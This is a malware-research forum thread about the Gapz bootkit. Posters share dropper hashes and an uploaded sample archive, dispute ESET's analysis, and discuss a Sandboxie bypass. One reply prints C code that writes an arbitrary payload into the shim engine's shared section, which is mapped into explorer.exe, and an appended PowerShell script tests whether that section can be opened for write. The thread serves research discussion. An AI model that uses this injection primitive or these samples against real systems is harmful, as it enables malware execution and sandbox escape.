Bootkit: Win32/Gapz

PostPosted: Thu Dec 27, 2012 12:27 pm
by R136a1
Hi there,

ESET (Aleksandr Matrosov) released an analysis of an interesting new Bootkit:

Win32/Gapz: steps of evolution
Win32/Gapz: New Bootkit Technique

Hashes of droppers and MBR are as follows:

Win32/Gapz.A (dropper)
SHA1 hash: 1f206ea64fb3ccbe0cd7ff7972bef2592bb30c84

Win32/Gapz.A (dropper)
SHA1 hash: dff6933199137cc49c2af5f73a2d431ce2e41084

Win32/Gapz.B (dropper)
SHA1 hash: e4b64c3672e98dc78c5a356a68f89e02154ce9a6

Win32/Gapz.C (dropper)
SHA1 hash: 85fb77682705b06a77d73638df3b22ac1dbab78b

Win32/Gapz.C (MBR)
SHA1 hash: b37afc51104688ea74d279b690d8631d4c0db2ad

If someone can provide a sample, please upload. Thanks!

Re: Bootkit: Win32/Gapz

PostPosted: Thu Dec 27, 2012 1:01 pm
by 360Tencent
3 droppers

Win32Gapz.zip

Re: Bootkit: Win32/Gapz

PostPosted: Sat Dec 29, 2012 5:29 am
by kmd
http://blog.eset.com/2012/12/27/win32gapz-steps-of-evolution


Very "professional" analysis from a Twitter expert.

I. The Shell_TrayWnd inject has been publicly available since 2009 and was initially posted on virustech.org, a PUBLIC forum, as a PUBLIC post.
II. The SetWindowLongA it calls sets the address of the injected shellcode, not KiUserApcDispatcher (wtf Matrosov?). As proof, use the attached sample 82a19f2e4c9a1b4295a51df9d23af84aae848a7984c141a0c7f67b3bbb77b271: break on SetWindowLongA; the address it points to is located in the explorer.exe address space. Dump it and look inside.

Re: Bootkit: Win32/Gapz

PostPosted: Sat Dec 29, 2012 6:58 am
by Mut4nt
This crap looks like it was made by skiddies.

Re: Bootkit: Win32/Gapz

PostPosted: Sat Dec 29, 2012 11:04 am
by EP_X0FF
Matrosov maybe does not really understand what he reverses; this happens sometimes to everyone (to some people more often). But what exactly did you find in this "crap" that made you think
Mut4nt wrote: looks like it was made by skiddies

?

Re: Bootkit: Win32/Gapz

PostPosted: Mon Dec 31, 2012 7:53 am
by stds
Mut4nt wrote: This crap looks like it was made by skiddies

I remember reversing one of the programs you tried to sell on hackforums: you had copy-pasted a public DKOM rootkit into a crypter; you even left in the debug strings from the original author.

I don't think you have any room to be calling anything crap... especially not a bootkit.

Re: Bootkit: Win32/Gapz

PostPosted: Tue Feb 12, 2013 3:17 pm
by bao

Re: Bootkit: Win32/Gapz

PostPosted: Tue Mar 05, 2013 8:54 am
by 0x16/7ton
Hello :)
Yes, maybe it is a bad article, but I wrote it here:
http://inresearching.blogspot.ru/2013/03/win32gapz-family-ring0-payload.html

Re: Bootkit: Win32/Gapz

PostPosted: Wed Mar 20, 2013 3:48 am
by kmd

Re: Bootkit: Win32/Gapz

PostPosted: Wed Mar 20, 2013 4:01 pm
by EP_X0FF
kmd wrote: Sandboxie bypassed by gapz?

http://exelab.ru/f/index.php?action=vth ... &page=1#11

The method of code injection used by Gapz is not isolated by Sandboxie 3.76 and Sandboxie 4.01 (Windows XP only), x86. As Sandboxie 4.0x now uses limited accounts for sandboxed processes, it is indeed more difficult to exploit: arbitrary code execution also will not work from a restricted account, as GetWindowLongPtr/SetWindowLongPtr will fail. It is very boring to test, but if you want you can follow the steps described in that link from exelab.

Code:
/* Native API (ntdll). Opens the shim engine's shared section and plants the
   caller-supplied bytes at the very end of its view, exactly as in the post:
   the section is mapped writable, so whatever is written here appears in
   every process that has the same section mapped (explorer.exe included). */
NTSTATUS PlantInShimSection(PVOID payload, SIZE_T payloadSize)
{
    UNICODE_STRING    usShimSection;
    OBJECT_ATTRIBUTES obja;
    HANDLE            hSection    = NULL;
    PUCHAR            BaseAddress = NULL;
    SIZE_T            ViewSize    = 0;      /* 0 = map the whole section */
    NTSTATUS          Status;

    RtlInitUnicodeString(&usShimSection, L"\\BaseNamedObjects\\ShimSharedMemory");
    InitializeObjectAttributes(&obja, &usShimSection, OBJ_CASE_INSENSITIVE, NULL, NULL);
    Status = NtOpenSection(&hSection, GENERIC_WRITE, &obja);
    if (NT_SUCCESS(Status)) {
        Status = NtMapViewOfSection(
            hSection,
            GetCurrentProcess(),
            (PVOID*)&BaseAddress,
            0,
            0,
            NULL,
            &ViewSize,      /* receives the mapped view size */
            ViewUnmap,
            0,
            PAGE_READWRITE
        );
        if (NT_SUCCESS(Status)) {
            /* write payload into the tail of the shared view */
            if (payloadSize <= ViewSize)
                memcpy((BaseAddress + ViewSize) - payloadSize, payload, payloadSize);
            NtUnmapViewOfSection(GetCurrentProcess(), BaseAddress);
        }
        NtClose(hSection);
    }
    return Status;
}


If Sandboxie allows this, then this kind of sandboxing is one big lulz, and successful exploitation of this code is a question of just another exploit suitable for arbitrary code execution. Needs more testing on various systems and various sections. As this is paid software, I have no intention of helping the author fix his ridiculous bugs or mistakes in the sandbox architecture overall.

This method of arbitrary code execution was known for years before Matrosov's "discovery", and we pretty surely know how and where he found it, hmm... "itw".

If you really care about security, you already use a virtual machine (freeware, btw), not paid, half-implemented virtualization with sleeping zero-days.
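A quick way to test the precondition of the section-tail write discussed in the post above (can the current account open the shim engine's shared section for write?) is the PowerShell check below. It is an added example, not code from EP_X0FF's post or from the exelab thread. It assumes the Win32 name Global\ShimSharedMemory resolves to the native object \BaseNamedObjects\ShimSharedMemory (the global namespace on Vista and later; on XP the prefix is harmless), and that OpenFileMapping's access bits FILE_MAP_READ/FILE_MAP_WRITE correspond to SECTION_MAP_READ/SECTION_MAP_WRITE, which is how kernel32 defines them.

```powershell
# Added check (not from the thread): report whether this account can open
# the shim shared section read-only and read-write. Run it once in a normal
# shell and once inside the sandbox / restricted account under test.
$sig = @'
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern IntPtr OpenFileMapping(uint dwDesiredAccess, bool bInheritHandle, string lpName);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(IntPtr hObject);
'@
$Win32 = Add-Type -MemberDefinition $sig -Name 'Mapping' -Namespace 'ShimCheck' -PassThru

$FILE_MAP_WRITE = [uint32]0x0002   # same bit as SECTION_MAP_WRITE
$FILE_MAP_READ  = [uint32]0x0004   # same bit as SECTION_MAP_READ
# Assumption: Global\ prefix selects \BaseNamedObjects (the native path in the post).
$SectionName = 'Global\ShimSharedMemory'

function Test-SectionAccess {
    param([string]$Name, [uint32]$Access, [string]$Label)

    $h   = $Win32::OpenFileMapping($Access, $false, $Name)
    $err = [System.Runtime.InteropServices.Marshal]::GetLastWin32Error()

    if ($h -ne [IntPtr]::Zero) {
        [void]$Win32::CloseHandle($h)
        return ('{0,-6} {1}: granted' -f $Label, $Name)
    }

    $why = switch ($err) {
        2       { 'section does not exist (shim engine not active, or wrong namespace)' } # ERROR_FILE_NOT_FOUND
        5       { 'access denied' }                                                       # ERROR_ACCESS_DENIED
        default { "Win32 error $err" }
    }
    return ('{0,-6} {1}: refused, {2}' -f $Label, $Name, $why)
}

Test-SectionAccess -Name $SectionName -Access $FILE_MAP_READ  -Label 'read'
Test-SectionAccess -Name $SectionName -Access $FILE_MAP_WRITE -Label 'write'
```

If "write ... granted" comes back from inside the sandboxed or restricted context, the section is exactly as reachable as the post's NtOpenSection(GENERIC_WRITE) call needs it to be, and the remaining question is only whether anything in explorer.exe ever executes what lands at the tail of the view. "Refused, access denied" on write but "granted" on read is the result to expect from a properly restricted account; "section does not exist" usually means the name was looked up in the wrong namespace (try dropping the Global\ prefix on XP, or check the object with WinObj).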